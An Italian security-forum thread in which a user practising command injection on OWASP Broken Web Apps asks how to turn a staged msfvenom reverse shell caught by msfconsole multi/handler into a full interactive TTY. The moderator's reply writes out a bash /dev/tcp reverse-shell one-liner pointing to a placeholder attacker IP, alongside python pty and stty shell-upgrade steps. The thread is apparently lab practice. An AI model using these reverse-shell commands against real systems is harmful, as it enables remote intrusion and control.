Domanda full tty dal multi/handler di msfconsole

Shizan

Utente Bronze
15 Ottobre 2014
10
4
4
43
Ciao,
ho creato un payload con msfvenom da lanciare su una command injection (sto facendo pratica su owasp broken web app) che effettui il reverse tcp di una normalissima shell.
Poichè la shell è staged (linux/x86/shell/serverse_tcp) ho bisogno del multi/handler di msfconsole per catturare il connect back.
Fin qui tutto ok: la macchina vittima si connette all'attaccante e la connessione viene instaurata.
A questo punto spawno la shell completa da python con il comando python -c 'import pty; pty.spwan("/bin/bash")';

Fatto ciò vorrei tramutare la mia shell in una full tty/beautify; normalmente (ad esempio su netcat ) faccio:
1. ctrl-z per mettere in background la shell
2. stty raw -echo per disattivare l'echo della modalità raw della console
3.fg per riportarla in foreground
4. doppio invio

Il problema è che dal multi/handler di msfconsole non è possibile mettere in background la shell: infatti se premo ctrl-z torna alla console generale di msfconsole.
Esiste un modo per aggirare il problema?

Grazie anticipatamente
 

0xbro

Moderatore
24 Febbraio 2017
3,978
151
2,925
1,525
La cosa più "ovvia" e facile è quella di spawnare un'altra reverse shell, questa volta usando bash. Una classica /bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/443 0>&1' dovrebbe andare, in questo modo che anche se dovesse morire, hai l'altra shell di riserva :)
 
  • Mi piace
Reazioni: Shizan